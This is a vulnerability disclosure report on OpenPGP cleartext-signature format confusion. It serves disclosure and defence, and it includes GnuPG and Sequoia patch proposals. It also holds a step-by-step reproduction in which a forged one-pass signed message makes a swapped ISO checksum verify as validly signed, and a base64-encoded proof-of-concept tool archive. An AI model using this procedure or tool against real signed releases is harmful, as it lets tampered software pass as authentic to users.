OpenPGP Cleartext Signature Framework Susceptible to Format Confusion An attacker can exploit ambiguous OpenPGP format syntax to deceive users into misinterpreting an ASCII-armored One-Pass Signed Message as a Cleartext Signature Framework message through a malformed header. Impact This format confusion enables substitution of the original signed data with malicious content while retaining a seemingly valid cryptographic verification. Users and automated checks may unknowingly accept altered or spoofed payloads as authentic, because popular PGP implementations, such as GnuPG, default to not explicitly displaying the actual data bound by the signature during validation. Despite documented issues with the Cleartext Signature Framework and GnuPG recommending against it, usage of cleartext signatures remains prevalent. The attack necessitates a valid OpenPGP signature applied to known, but non-chosen, arbitrary data. Details The attack is to disguise a One-Pass Signed Message (e.g. created through gpg --sign) as a Cleartext Signature Framework message (gpg --clearsign) The RFC 9580 mandates, that a One-Pass Signed Message encompasses the following packets: * a One-Pass Signature Packet: Unprotected metadata, including: * Hash algorithm, * Public key algorithm, * Short key-id of the signing key. * a Literal Data Packet: The signed data. * a Signature Packet: A binding between some public key and some data. Any OpenPGP signature format containing a valid Signature Packet alongside the signed data, such as the Cleartext Signature Framework, can be converted to a One-Pass Signed Message through: * forgery of a One-Pass Signature Packet (contains no cryptographically protected contents), and * encoding of the signed data in a Literal Data Packet, and * copying the Signature Packet. Since the conversion preserves both the signed data and the signature, cryptographic integrity remains intact. Keying material - neither private nor public - is not required to conduct the conversion, and a Python script for this procedure is provided in the appendix as a proof of concept. The attack leverages the ambiguity of the OpenPGP Armor Header Line, which allows a One-Pass Signed Message to be wrapped by BEGIN PGP MESSAGE or BEGIN PGP SIGNATURE. Additionally, the OpenPGP specifically does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored OpenPGP message. A recipient of an OpenPGP signature might be deceived by an adversary through a malformed Armor Header Line into incorrectly assuming the Cleartext Signature Framework was used. This allows for stuffing arbitrary data, that the user incorrectly believes to be signed. The OpenPGP specifically does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored OpenPGP message. Common OpenPGP implementations silently discard any superfluous data preceding the One-Pass Signed Message including malformed Armor Header Lines. The One-Pass Signed Message subsequently passes cryptographic validation. By default GnuPG does not output the signed data during validation, which further helps in deceiving the user. Detailed steps to reproduce Scenario Alice wants to transmit a file (UwUntu.iso) to Bob. Alice wants to assert her authorship and prevent manipulations to the file. Alice has created an OpenPGP keypair and securely transferred her public key to Bob. Mallory is a threat actor able to intercept and manipulate communications between Alice and Bob. Her goal is to replace the legitimate file (UwUntu.iso) through her malicious one (EnterpriseLinux.iso) while seemingly preserving valid cryptographic verification. UwUntu.iso and EnterpriseLinux.iso differ in their contents and thus their SHA256 checksums. Mallory possesses neither private nor public keying material used by Alice. Mallory did not interfere with the initial key exchange between Alice and Bob. Procedure Alice decides to clearsign the SHA256 checksum of UwUntu.iso: sha256sum --status UwUntu.iso --tag | gpg --clearsign --local-user [email protected] --armor | tee UwUntu.iso-CHECKSUM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 -----BEGIN PGP SIGNATURE----- iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA VHK9nCInS1fNKbWo8NiedYVOXnISOgs= =a6YF -----END PGP SIGNATURE----- Alice then starts transmission of UwUntu.iso and UwUntu.iso-CHECKSUM to Bob. Mallory intercepts this transmission. She then converts the Cleartext Signature to a One-Pass Signed Message, that she disguises as a Cleartext Signature: $ python fake-signature/main.py ./UwUntu.iso-CHECKSUM /dev/stdout -----BEGIN PGP SIGNED MESSAGE------ Hash: SHA512 -----BEGIN PGP SIGNATURE----- kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5 NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL =//2u -----END PGP SIGNATURE----- Mallory replaces with the checksum tag of her malicious EnterpriseLinux.iso: -----BEGIN PGP SIGNED MESSAGE------ Hash: SHA512 SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9 -----BEGIN PGP SIGNATURE----- kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5 NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL =//2u -----END PGP SIGNATURE----- Mallory replaces the contents of UwUntu.iso with those of EnterpriseLinux.iso. Having modified both UwUntu.iso and the signature UwUntu.iso-CHECKSUM, Mallory forwards the files to Bob. Bob verifies the signature: $ cat ./UwUntu.iso-CHECKSUM | gpg --verify gpg: Signature made Sun Jul 6 17:10:24 2025 CEST gpg: using EDDSA key E81E1001FC831508C5AC7CEF00D80363D1094973 gpg: Good signature from "Alice <[email protected]>" [ultimate] Confident over the legitimacy of UwUntu.iso-CHECKSUM, Bob verifies, that UwUntu.iso actually matches UwUntu.iso-CHECKSUM: sha256sum --check UwUntu.iso-CHECKSUM UwUntu.iso: OK Mallory’s attack succeeded, as she deceived Bob into believing the manipulated UwUntu.iso to be cryptographically signed by Alice. The verification process involving cleartext signatures and SHA256 checksums is utilized by multiple well-known software distributions and exists beyond the scope of this theoretical example. Recommendations Removal of the Cleartext Signature Framework from the OpenPGP standard helps resolve the issues with the Cleartext Signature Framework. Furthermore, deprecation allows for a graceful phase-out. OpenPGP users should avoid using cleartext signatures, as is also recommended by GnuPG. To prevent confusion about the actual signed data, OpenPGP implementations should output the data bound by the signature during validation by default. sequoia-sq does so. GnuPG does not and requires the --output option to be set. When working with OpenPGP signatures in general, users should instruct their PGP implementation to output the signed data and only use this output for any further or related tasks. Credits * Finder credits: 49016 * PoC & writeup: 49016, Flüpke, Sivizius, Liam Appendix fake-signature.tar.xz.b64 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 yi0RscRn+wIAAAAABFla -------------------------------------------------------------------------- Disclosure Timeline: * 21.10.2025: Submission of initial version of this report. Upcoming Timeline: * 24.10.2025: Submission of a talk for 39th Chaos Communication Congress (39C3). No technical details shared. * 21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/ * 26-31.12.2025: If accepted by content team, 39C3 Congress talk regarding this report Please note: While we might be able to offer some flexibility, our plan is to adhere to the above stated upcoming timeline, regardless of the availability of patches or fixes. We kindly request allocation of a CVE number to track this issue. Please keep us updated regarding your remediation efforts. Thank you Best, Liam -------------------------------------------------------------------------- Recommended patches Shared: 1. Phasing out cleartext signatures completely is suggested. This requires a new OpenPGP standard version, and a deprecation period. Not possible until disclosure deadline For GPG: 2. Only verify cleartext signatures if an explicit cleartext verification option is provided. Prevents confusion of signature format. Verification could fail if an expected cleartext signature is malformed. 3. Always output the data that was actually verified, at least for Cleartext signatures and One-Pass signatures. Might be problematic because of binary output and output limits. 1. Alternatively, output a warning if output option is not used. For Sequoia: 2. Only verify the signature type as specified in command line. User asks for cleartext -> give them cleartext or nothing. GPG Option 2 Introduce a new command for verification of cleartext signatures. Accept cleartext signatures only if this command was used. In case no command is provided, the verified data is implicitly printed. Cleartext signatures can be accepted in this case because tampering should be visible in the output. Optionally, signature type detection could include cleartext signatures if an output option was specified. Separating cleartext signatures into a separate command for verification makes deprecating of this message type easier. GPG Option 3 A default output file for verification can be set here. STDOUT/STDERR might be dangerous due to binary output, other files are likely a bad default. This should be paired with asking users before printing binary output, skipping binary output or printing as hexadecimal. diff --git a/g10/gpg.c b/g10/gpg.c index 99fe5b844..5f80c93e7 100644 --- a/g10/gpg.c +++ b/g10/gpg.c @@ -4698,6 +4698,8 @@ main (int argc, char **argv) break; case aVerify: + if (!opt.outfile) + opt.outfile = "-"; if (multifile) { if ((rc = verify_files (ctrl, argc, argv))) GPG Option 3.1 Inform the user once about the dangers of verifying signatures without checking what was verified. Does not output a warning if an output was explicitly defined or was activated implicitly because no command was given. diff --git a/g10/mainproc.c b/g10/mainproc.c index 8108a07b7..b73580f13 100644 --- a/g10/mainproc.c +++ b/g10/mainproc.c @@ -234,6 +234,13 @@ add_signature (CTX c, PACKET *pkt) { kbnode_t node; + if (!c->any.sig_seen && !c->signed_data.used + && !(opt.outfp || opt.outfile || !c->sigs_only)) + { + log_error ("WARNING: Verified data might differ from assumed input,\n"); + log_error ("use --output to validate actual signed data."); + } + c->any.sig_seen = 1; if (pkt->pkttype == PKT_SIGNATURE && !c->list) { Sequoia Verification Recommendations Documentation, CLI and man page document separate verification options. However, the (inline) message verification and cleartext verification are passed to the same handler internally. There should be separate builders and verifiers for both types as this behaviour is security relevant. Also, it is what users would expect from the man page. Only the documentation declares that sequoia tries to verify despity the type provided by the user. References Visible links . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#section-7 . https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s . https://www.gnupg.org/documentation/manuals/gnupg/Operational-GPG-Commands.html#:~:text=It%20is%20suggested%20to%20avoid%20cleartext%20signatures%20in%20favor%20of%20detached%20signatures. . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo . https://www.rfc-editor.org/rfc/rfc9580.html . https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t . https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id . https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2 . https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2 . https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t . https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id . https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2 . https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line . https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo . https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages . https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo . https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s . https://seclists.org/fulldisclosure/